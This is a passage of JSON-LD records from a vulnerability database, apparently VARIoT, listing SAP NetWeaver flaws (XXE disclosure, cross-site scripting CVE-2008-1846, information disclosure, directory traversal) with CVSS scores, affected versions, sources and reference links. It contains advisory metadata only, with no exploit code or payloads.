"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
},
{
"db": "PACKETSTORM",
"id": "117713"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
]
},
"id": "VAR-201210-0703",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6147"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6147"
}
]
},
"last_update_date": "2022-05-17T22:33:28.708000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver PMI Agent XML External Entity Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/24377"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6147"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/51063/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/56281"
},
{
"trust": 0.4,
"url": "http://erpscan.com/advisories/dsecrg-12-037-sap-netweaver-pmi-agent-configuration-xml-external-entity/"
},
{
"trust": 0.4,
"url": "https://service.sap.com/sap/support/notes/1721309"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51063"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51063/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51063/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
},
{
"db": "PACKETSTORM",
"id": "117713"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
},
{
"db": "PACKETSTORM",
"id": "117713"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-30T00:00:00",
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"date": "2012-10-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"date": "2012-10-25T00:00:00",
"db": "BID",
"id": "56281"
},
{
"date": "2012-10-27T07:33:15",
"db": "PACKETSTORM",
"id": "117713"
},
{
"date": "2012-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-10-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"date": "2012-10-25T00:00:00",
"db": "BID",
"id": "56281"
},
{
"date": "2012-11-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver PMI Agent XML External Entity Information Disclosure Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
],
"trust": 0.6
}
}
var-200804-0326
Vulnerability from variot
The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the "Always Use Secure HTML Editor" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file. SAP NetWeaver is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200804-0326",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 sp15"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver application server sp17",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.40"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "28699"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:sp8:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1846"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jaime Blasco from Aitsec Information Technology Security",
"sources": [
{
"db": "BID",
"id": "28699"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
],
"trust": 0.9
},
"cve": "CVE-2008-1846",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2008-1846",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1846",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200804-252",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the \"Always Use Secure HTML Editor\" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file. SAP NetWeaver is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "BID",
"id": "28699"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1846",
"trust": 2.7
},
{
"db": "BID",
"id": "28699",
"trust": 1.9
},
{
"db": "SREASON",
"id": "3812",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1019822",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695",
"trust": 0.8
},
{
"db": "XF",
"id": "41735",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080409 SAP NETWEAVER 6.40-7.0 CROSS-SITE-SCRIPTING",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "28699"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"id": "VAR-200804-0326",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.49319461333333336
},
"last_update_date": "2023-12-18T12:58:53.314000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NetWeaver",
"trust": 0.8,
"url": "http://scn.sap.com/community/netweaver"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.aitsec.com/vulnerability-sap-netweaver-6.40-7.0-cross-site-scripting.php"
},
{
"trust": 1.6,
"url": "http://securityreason.com/securityalert/3812"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/28699"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id?1019822"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1846"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1846"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/41735"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/490625/100/0/threaded"
},
{
"trust": 0.3,
"url": "http://help.sap.com/saphelp_nw70/helpdata/en/44/4cd511c6233f8ee10000000a1553f7/frameset.htm"
},
{
"trust": 0.3,
"url": "/archive/1/490625"
}
],
"sources": [
{
"db": "BID",
"id": "28699"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "28699"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-04-09T00:00:00",
"db": "BID",
"id": "28699"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"date": "2008-04-16T17:05:00",
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"date": "2008-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-05-07T17:30:00",
"db": "BID",
"id": "28699"
},
{
"date": "2012-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-005695"
},
{
"date": "2018-10-11T20:37:41.027000",
"db": "NVD",
"id": "CVE-2008-1846"
},
{
"date": "2009-01-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Filesystem Feedbacks Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "28699"
},
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200804-252"
}
],
"trust": 0.6
}
}
var-201703-1427
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-1427",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96903"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "96903"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "96903"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "96903",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "96903"
}
]
},
"id": "VAR-201703-1427",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:04:31.697000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2372188"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
}
],
"sources": [
{
"db": "BID",
"id": "96903"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "96903"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96903"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-16T00:03:00",
"db": "BID",
"id": "96903"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "96903"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "96903"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "96903"
}
],
"trust": 0.3
}
}
var-201608-0527
Vulnerability from variot
SAP NetWeaver AS ABAP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0527",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver as abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "92421"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "92421"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS ABAP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can use specially crafted requests with directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files in the context of the application. This may aid in further attacks.",
"sources": [
{
"db": "BID",
"id": "92421"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "92421",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "92421"
}
]
},
"id": "VAR-201608-0527",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.23280389499999998
},
"last_update_date": "2022-05-17T01:45:18.326000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://erpscan.com/advisories/erpscan-16-031-sap-netweaver-abap-directory-traversal-via-using-read-dataset/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2312966"
}
],
"sources": [
{
"db": "BID",
"id": "92421"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "92421"
}
